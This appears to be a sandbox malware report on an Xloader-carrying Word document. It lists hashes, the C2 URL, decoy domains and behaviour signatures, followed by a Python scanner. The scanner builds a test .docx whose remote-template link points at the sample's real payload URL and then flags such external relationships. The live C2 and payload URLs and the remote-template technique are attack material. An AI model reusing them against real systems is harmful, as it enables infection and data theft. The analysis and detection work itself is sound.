General
Target: 2f1dfefc6a2744bf853c5eb70a3df665.docx.zip
Size: 7KB
Sample: 210614-d1azk3wrbj
MD5: 3325306a3e6c341de30a4038905f5945
SHA1: a1fde655303040c00a863097295f1199314b6d32
SHA256: 96e01da5fe7172331adb93fee0fc4d383f90d2672501138aa0a1c6bec0a48282
SHA512: 4a77610084ab3d8eede9c58d44ce3650fa71ae7d7116a77098afce6108ee57ad6e9d3d169acb716fef589b4d411cf180f748c08a772bc17eae1c48847ddff673
Static task: static1
Behavioral task: behavioral1
  Sample: 2f1dfefc6a2744bf853c5eb70a3df665.docx
  Resource: win7v20210410
Behavioral task: behavioral2
  Sample: 2f1dfefc6a2744bf853c5eb70a3df665.docx
  Resource: win10v20210408
Malware Config
Extracted (external location referenced by the document)
URL: http://192.3.141.131/-..........................................-/.......................................wbk
Extracted
Family: xloader
Version: 2.3
C2: http://www.morsowanie.com/j26a/
Decoy domains:
reviewdrpopp.com
socaldelicious.com
juomas.com
bhcrown.com
blaxies3.com
tpcmotion.com
corporacionms.com
schwartstack.com
smw319.com
bacheasy.xyz
visitmojacar.info
xn--ycr7s7jl43p.com
motherland-foods.com
helenternet.com
santabobgroup.com
lefoyerbanquets.com
ambert2021.com
multitudo21.com
abominos.com
asesoriadtesis.com
maternitatemocionada.com
afafiabaya.com
tokade.club
animas.one
globalrevenue-method.life
mambosaucedc.com
bowodee.com
thechampagnewanderlust.com
u401k.com
lokwith999.com
bryanandvictoria.com
lifeissweat.com
cercalconsultores.com
caddieup.golf
mytewi.com
dbcn-kerjadirumah.com
rthesamba.com
7695696.com
bestdeals-shop.com
lizelleh.com
theshadesofyou.com
meikaixin.com
ceipvirgendeloreto.com
bazzaretracker.com
epboards.com
siriusksa.com
xn--pypl-qoac.com
shopdreamwife.com
healthcareracism.com
ashgrovekinsale.com
maghion.com
shopmedjool.com
313videos.com
twistedseedcomic.com
donggangxl.com
crozent.com
dialite.pro
fjqljf.com
28stanton.com
hvtnywveba.club
ukinbase.com
criandojuntas.com
centenhouse.com
motion-mill-tv.com
Targets
Target: 2f1dfefc6a2744bf853c5eb70a3df665.docx
Size: 10KB
MD5: 8d5d15825e35f4f19f2d2ac1836c5087
SHA1: 09c047b6473703704805748926e226c700322593
SHA256: 2109c5a512a7c5f23fd4b7eb251195ac00f5d8e3798bee07927f89c5b50bc2bb
SHA512: d965bba779c742fa4e0733b3cc25b13684ad301381519c1d7d85470b3df94b82883362e75d7a1c929595a2e1800c7b3fa3d56b9471269cf05c7202007118ea3d
Signatures:
- Xloader Payload
- Blocklisted process makes network request
- Downloads MZ/PE file
- Executes dropped EXE
- Abuses OpenXML format to download file from external location
- Loads dropped DLL
- Uses the VBS compiler for execution
- Suspicious use of SetThreadContext
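The "Abuses OpenXML format to download file from external location" signature and the extracted 192.3.141.131 URL point at the same mechanism: a relationship inside the .docx package with TargetMode="External", typically the attachedTemplate relationship in word/_rels/settings.xml.rels, which makes Word fetch the target when the document opens. The scanner below is an added example written for this page, not code from the sandbox vendor or the report; it builds a minimal .docx in memory (constructed, not the original sample), walks every .rels part for external targets, and applies a few heuristics of my own (raw IP host, dot-padded path, template target without a template extension). Only the template URL is taken from the report's extracted configuration.

```python
"""Find external relationships in an OpenXML (.docx) package and rate them.

Added example for this report, not the sandbox's own code. The .docx is
constructed below; the template URL comes from the report's Malware Config.
"""
import io
import ipaddress
import re
import xml.etree.ElementTree as ET
import zipfile
from urllib.parse import urlparse

# Copied from the "Malware Config / Extracted" section of the report.
SAMPLE_TEMPLATE_URL = "http://192.3.141.131/-..........................................-/.......................................wbk"

PKG_RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
DOC_RELS_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
WORD_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
TEMPLATE_EXTENSIONS = (".dot", ".dotx", ".dotm")


def build_sample_docx(template_url: str) -> bytes:
    """Constructed minimal .docx whose settings part points at a remote template.
    [Content_Types].xml and most parts are omitted; the scanner only reads .rels."""
    root_rels = (
        f'<Relationships xmlns="{PKG_RELS_NS}">'
        f'<Relationship Id="rId1" Type="{DOC_RELS_NS}/officeDocument" Target="word/document.xml"/>'
        "</Relationships>"
    )
    document_rels = (
        f'<Relationships xmlns="{PKG_RELS_NS}">'
        f'<Relationship Id="rId1" Type="{DOC_RELS_NS}/settings" Target="settings.xml"/>'
        "</Relationships>"
    )
    # w:attachedTemplate carries only an r:id; the URL lives in the .rels part.
    settings = (
        f'<w:settings xmlns:w="{WORD_NS}" xmlns:r="{DOC_RELS_NS}">'
        '<w:attachedTemplate r:id="rId1"/></w:settings>'
    )
    settings_rels = (
        f'<Relationships xmlns="{PKG_RELS_NS}">'
        f'<Relationship Id="rId1" Type="{DOC_RELS_NS}/attachedTemplate" '
        f'Target="{template_url}" TargetMode="External"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("_rels/.rels", root_rels)
        zf.writestr("word/document.xml", f'<w:document xmlns:w="{WORD_NS}"/>')
        zf.writestr("word/_rels/document.xml.rels", document_rels)
        zf.writestr("word/settings.xml", settings)
        zf.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


def external_relationships(docx_bytes: bytes) -> list[tuple[str, str, str, str]]:
    """Return (rels part, Id, short relationship type, Target) for every
    relationship in the package whose TargetMode is External."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".rels"):
                continue
            # expat does not resolve external entities, so parsing attacker
            # controlled XML here causes no network access.
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{PKG_RELS_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                found.append((name, rel.get("Id", ""), rtype, rel.get("Target", "")))
    return found


def suspicion_reasons(rtype: str, target: str) -> list[str]:
    """Heuristics of my own for an external target; empty list means nothing stood out."""
    reasons = []
    if rtype in ("attachedTemplate", "oleObject"):
        reasons.append(f"{rtype} fetched from an external location")
    url = urlparse(target)
    try:
        ipaddress.ip_address(url.hostname or "")
        reasons.append("host is a raw IP literal")
    except ValueError:
        pass
    if re.search(r"\.{10,}", url.path):
        reasons.append("path padded with long runs of dots")
    if rtype == "attachedTemplate" and not url.path.lower().endswith(TEMPLATE_EXTENSIONS):
        reasons.append("template target lacks a Word template extension")
    return reasons


def scan(docx_bytes: bytes) -> list[dict]:
    """Combine the two steps into one report per external relationship."""
    return [
        {"part": part, "id": rid, "type": rtype, "target": target,
         "reasons": suspicion_reasons(rtype, target)}
        for part, rid, rtype, target in external_relationships(docx_bytes)
    ]


if __name__ == "__main__":
    for hit in scan(build_sample_docx(SAMPLE_TEMPLATE_URL)):
        print(f"{hit['part']} {hit['id']} {hit['type']} -> {hit['target']}")
        for reason in hit["reasons"]:
            print(f"    ! {reason}")
```

Run it against a real document with `scan(open("file.docx", "rb").read())`; the same walk covers oleObject links in document.xml.rels and external targets in any other part, which is why the scanner reads every .rels file rather than only settings.xml.rels.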